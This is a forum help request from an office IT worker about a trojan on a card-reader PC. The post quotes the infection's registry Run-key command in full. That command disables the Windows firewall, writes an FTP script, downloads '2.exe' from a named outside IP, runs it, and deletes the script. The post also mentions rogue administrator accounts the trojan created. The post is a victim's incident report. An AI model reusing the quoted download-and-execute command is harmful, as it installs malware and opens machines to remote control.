回复: net use bye xuzijianyes /add(net病毒)
今天过来公司值班,远程到有问题的那部电脑,发现:net use bye xuzijianyes /add已经没有了,shell项的内容变成了:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi。很明显,木马就是看中了这电脑刷卡机,估计从60.173.10.220安徽铜陵电信服务器中下载2.exe放在c:\windows\system32,并且附带了sb.txt文件,该sb.txt文件图标被伪装成系统无法辨认模样,用记事本打开后,发现会下载68.exe文件,但是我搜索整个硬盘没发现,包括隐藏文件夹也没有,我马上把这2.exe sb.txt删除,然后,在C:\Documents and Settings中,将所有用户文件夹里面的cmd.txt删除。可惜的是,注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的“shell” c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 60.173.10.220> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 2.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&2.exe&2.exe&del cmd.txt /q /f&exi,我却无法删除,提示我没有修改或者删除的权限。哎,管理员权限都无法删除,这个木马制作者,实在太狠了。咱们论坛里面有没有这样的高手?(貌似这个作者写出来的这个东西最近很流行的)
还有,它还会自己产生几个未知的用户:bodong,asd,全部是管理员权限的。看来,我只能重新安装系统了。
附上第二次扫描结果:
附件: SREngLOG.log (2011-5-29 20:10:15, 78.81 K)
该附件被下载次数 353